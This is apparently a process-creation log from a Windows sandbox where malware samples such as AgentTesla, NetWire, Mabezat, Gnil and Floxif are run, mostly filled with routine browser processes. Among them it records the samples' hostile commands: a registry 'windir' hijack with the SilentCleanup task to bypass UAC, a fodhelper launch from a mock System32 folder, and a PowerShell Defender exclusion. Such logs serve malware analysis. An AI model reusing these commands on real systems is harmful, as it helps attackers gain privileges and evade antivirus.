"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5824 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {246a30cb-6a8d-4338-84c4-ef38ad9a7673} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6280 -childID 6 -isForBrowser -prefsHandle 6196 -prefMapHandle 6256 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1de4a37d-6585-4e41-ba9e-d39ca9861e0b} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6620 -childID 7 -isForBrowser -prefsHandle 6592 -prefMapHandle 6496 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463c799b-51cf-48bd-b469-f9663597a1a8} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6740 -childID 8 -isForBrowser -prefsHandle 6820 -prefMapHandle 6816 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c599aa85-6427-465d-8ea0-64e4a85e781b} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6920 -childID 9 -isForBrowser -prefsHandle 6928 -prefMapHandle 6932 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {033efa49-c8ad-4464-8f41-2d1045ba5282} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3760 -childID 10 -isForBrowser -prefsHandle 3592 -prefMapHandle 3860 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a27fec1a-e250-445d-899c-20fa3bc3f01a} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 11 -isForBrowser -prefsHandle 6492 -prefMapHandle 5860 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e98defa1-84ba-4d9e-abbc-c7a5212f3604} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 12 -isForBrowser -prefsHandle 5936 -prefMapHandle 5940 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6d46063-a24c-435b-a0a4-c84b5f2e528c} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe
"C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc3a1e46f8,0x7ffc3a1e4708,0x7ffc3a1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4944 -childID 13 -isForBrowser -prefsHandle 4936 -prefMapHandle 4956 -prefsLen 30493 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51632daf-82e8-4460-b21b-54f9cac381fe} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1460 -childID 14 -isForBrowser -prefsHandle 1456 -prefMapHandle 6128 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce41d50-c1c1-48be-898d-1c1e718e56b9} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\AgentTesla.exe
"C:\Users\Admin\Desktop\AgentTesla.exe"
C:\Users\Admin\Desktop\AgentTesla.exe
"C:\Users\Admin\Desktop\AgentTesla.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7296 -childID 15 -isForBrowser -prefsHandle 1668 -prefMapHandle 4064 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08e562a1-6159-4a25-b748-557d06a3c40f} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x340 0x4f8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d/detection
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc37f946f8,0x7ffc37f94708,0x7ffc37f94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
C:\Windows\SysWOW64\Notepad.exe
C:\Windows\System32\Notepad.exe
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7060 -childID 16 -isForBrowser -prefsHandle 7008 -prefMapHandle 6020 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13b938ea-454f-4cab-8669-870e3d75703d} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6028 -childID 17 -isForBrowser -prefsHandle 5920 -prefMapHandle 6644 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a43d8a69-923a-4c62-a458-8d1adcbc6a9e} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6752 -childID 18 -isForBrowser -prefsHandle 6340 -prefMapHandle 6824 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b38b883-98eb-4ded-8bad-30b11ca77e63} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
C:\Windows \System32\fodhelper.exe
"C:\Windows \System32\fodhelper.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Public\x.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap16696:70:7zEvent1363
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Walker\" -ad -an -ai#7zMap15300:70:7zEvent19357
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/2ae0c4a5f1fedf964e2f8a486bf0ee5d1816aac30c889458a9ac113d13b50ceb/detection
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc381a46f8,0x7ffc381a4708,0x7ffc381a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6216 -ip 6216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 432
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6252 -ip 6252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7192 -ip 7192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7192 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3384 -ip 3384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 2756 -ip 2756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 196
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4980 -ip 4980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6368 -ip 6368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
